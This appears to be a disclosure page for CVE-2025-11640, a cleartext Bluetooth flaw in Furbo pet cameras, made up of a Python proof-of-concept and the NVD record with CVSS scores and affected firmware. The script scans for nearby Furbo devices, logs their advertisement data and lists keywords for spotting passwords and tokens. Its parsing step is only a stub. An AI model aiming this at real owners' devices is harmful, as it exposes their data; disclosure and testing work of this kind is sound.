CVE-2025-11640

# CVE-2025-11640 - Furbo BLE Cleartext Transmission PoC # This PoC demonstrates sniffing BLE traffic from Furbo 360/Furbo Mini devices # Requirements: Ubertooth One or nRF Sniffer, bluepy/bleak library import asyncio from bleak import BleakScanner from datetime import datetime # Target device name patterns for Furbo devices TARGET_PATTERNS = ["Furbo", "FB0035", "MC0020"] class FurboBLESniffer: def __init__(self): self.captured_packets = [] self.target_devices = [] def detection_callback(self, device, advertisement_data): """Callback to process discovered BLE devices""" device_name = device.name or "" # Check if discovered device matches Furbo patterns for pattern in TARGET_PATTERNS: if pattern.lower() in device_name.lower(): print(f"[+] Found target device: {device_name} [{device.address}]") self.target_devices.append({ "name": device_name, "address": device.address, "rssi": advertisement_data.rssi, "manufacturer_data": advertisement_data.manufacturer_data }) # Capture raw advertisement data (transmitted in cleartext) self.captured_packets.append({ "timestamp": datetime.now().isoformat(), "device": device.address, "raw_data": advertisement_data, "service_uuids": advertisement_data.service_uuids }) async def scan_for_vulnerable_devices(self, timeout=30): """Scan for vulnerable Furbo devices transmitting cleartext data""" print(f"[*] Starting BLE scan (timeout: {timeout}s)...") print("[*] Looking for Furbo 360 (FB0035) and Furbo Mini (MC0020)") scanner = BleakScanner(detection_callback=self.detection_callback) await scanner.start() await asyncio.sleep(timeout) await scanner.stop() return self.target_devices def analyze_cleartext_data(self): """Analyze captured cleartext BLE transmissions""" print("\n[*] Analyzing captured cleartext data...") sensitive_patterns = [b"password", b"token", b"key", b"auth", b"session"] for pkt in self.captured_packets: print(f"\n[!] Cleartext data from {pkt['device']}:") print(f" Service UUIDs: {pkt['service_uuids']}") # In real exploitation, raw payload would be parsed here print(f" [!] WARNING: Data transmitted without encryption") async def main(): print("=" * 60) print("CVE-2025-11640 - Furbo BLE Cleartext Transmission PoC") print("Affected: Furbo 360 <= FB0035_FW_036") print("Affected: Furbo Mini <= MC0020_FW_074") print("=" * 60) sniffer = FurboBLESniffer() targets = await sniffer.scan_for_vulnerable_devices(timeout=30) if targets: print(f"\n[+] Found {len(targets)} vulnerable device(s)") sniffer.analyze_cleartext_data() else: print("\n[-] No vulnerable Furbo devices found in range") if __name__ == "__main__": asyncio.run(main())

{"cve": {"id": "CVE-2025-11640", "sourceIdentifier": "[email protected]", "published": "2025-10-12T18:15:34.333", "lastModified": "2025-10-29T13:53:21.693", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Tomofun Furbo 360 and Furbo Mini. This affects an unknown function of the component Bluetooth Low Energy. The manipulation results in cleartext transmission of sensitive information. Access to the local network is required for this attack. Attacks of this nature are highly complex. The exploitability is reported as difficult. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "ADJACENT", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:A/AC:H/Au:N/C:P/I:N/A:N", "baseScore": 1.8, "accessVector": "ADJACENT_NETWORK", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.2, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-310"}, {"lang": "en", "value": "CWE-319"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "074", "matchCriteriaId": "06B19876-699B-455F-945F-AF26C60BF965"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F549356-AF78-447C-8689-D9DD1A9202DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*" ... (truncated)